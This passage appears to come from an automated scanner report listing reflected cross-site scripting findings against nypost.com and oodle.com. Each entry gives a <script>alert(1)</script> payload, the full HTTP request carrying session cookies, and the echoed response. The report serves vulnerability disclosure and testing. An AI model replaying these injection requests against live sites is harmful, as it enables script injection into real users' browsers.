Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortalac67d<script>alert(1)</script>f5d5330c430/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.150. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97d83<script>alert(1)</script>2f4608182c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost97d83<script>alert(1)</script>2f4608182c0/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost97d83<script>alert(1)</script>2f4608182c0/unica/hbx_original.js</p>
...[SNIP]...

1.151. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ad8c<script>alert(1)</script>f87f55a7e8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica5ad8c<script>alert(1)</script>f87f55a7e8b/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica5ad8c<script>alert(1)</script>f87f55a7e8b/hbx_original.js</p>
...[SNIP]...

1.152. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 45010<script>alert(1)</script>432d944b730 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js45010<script>alert(1)</script>432d944b730 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js45010<script>alert(1)</script>432d944b730</p>
...[SNIP]...

1.153. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7cf57<script>alert(1)</script>947f89fd93a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig7cf57<script>alert(1)</script>947f89fd93a/WebPortal/nypost/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig7cf57<script>alert(1)</script>947f89fd93a/WebPortal/nypost/unica/migration.js</p>
...[SNIP]...

1.154. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27d7e<script>alert(1)</script>4ab2ac3b8e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal27d7e<script>alert(1)</script>4ab2ac3b8e8/nypost/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal27d7e<script>alert(1)</script>4ab2ac3b8e8/nypost/unica/migration.js</p>
...[SNIP]...

1.155. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3063c<script>alert(1)</script>87f44a199fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost3063c<script>alert(1)</script>87f44a199fe/unica/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost3063c<script>alert(1)</script>87f44a199fe/unica/migration.js</p>
...[SNIP]...

1.156. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62042<script>alert(1)</script>e768e25bd10 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica62042<script>alert(1)</script>e768e25bd10/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica62042<script>alert(1)</script>e768e25bd10/migration.js</p>
...[SNIP]...

1.157. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/migration.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 97978<script>alert(1)</script>bd993e6441a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/migration.js97978<script>alert(1)</script>bd993e6441a HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/migration.js97978<script>alert(1)</script>bd993e6441a</p>
...[SNIP]...

1.158. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1350<script>alert(1)</script>c23b0965f93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigc1350<script>alert(1)</script>c23b0965f93/WebPortal/nypost/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigc1350<script>alert(1)</script>c23b0965f93/WebPortal/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.159. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3587c<script>alert(1)</script>dfe201754e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal3587c<script>alert(1)</script>dfe201754e1/nypost/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal3587c<script>alert(1)</script>dfe201754e1/nypost/unica/ntpagetag.js</p>
...[SNIP]...

1.160. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<script>alert(1)</script>b924448cc4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypostdcef3<script>alert(1)</script>b924448cc4/unica/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypostdcef3<script>alert(1)</script>b924448cc4/unica/ntpagetag.js</p>
...[SNIP]...

1.161. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72d2f<script>alert(1)</script>2ebfc73401 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica72d2f<script>alert(1)</script>2ebfc73401/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica72d2f<script>alert(1)</script>2ebfc73401/ntpagetag.js</p>
...[SNIP]...

1.162. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 82555<script>alert(1)</script>cd916418285 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js82555<script>alert(1)</script>cd916418285 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js82555<script>alert(1)</script>cd916418285</p>
...[SNIP]...

1.163. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc5be"><script>alert(1)</script>54f964f95d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cc5be"><script>alert(1)</script>54f964f95d1=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:23:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=04039d161b6f4d305c54caf045ea7f92; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENEZFQzYxNTRDRjAxNzU3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
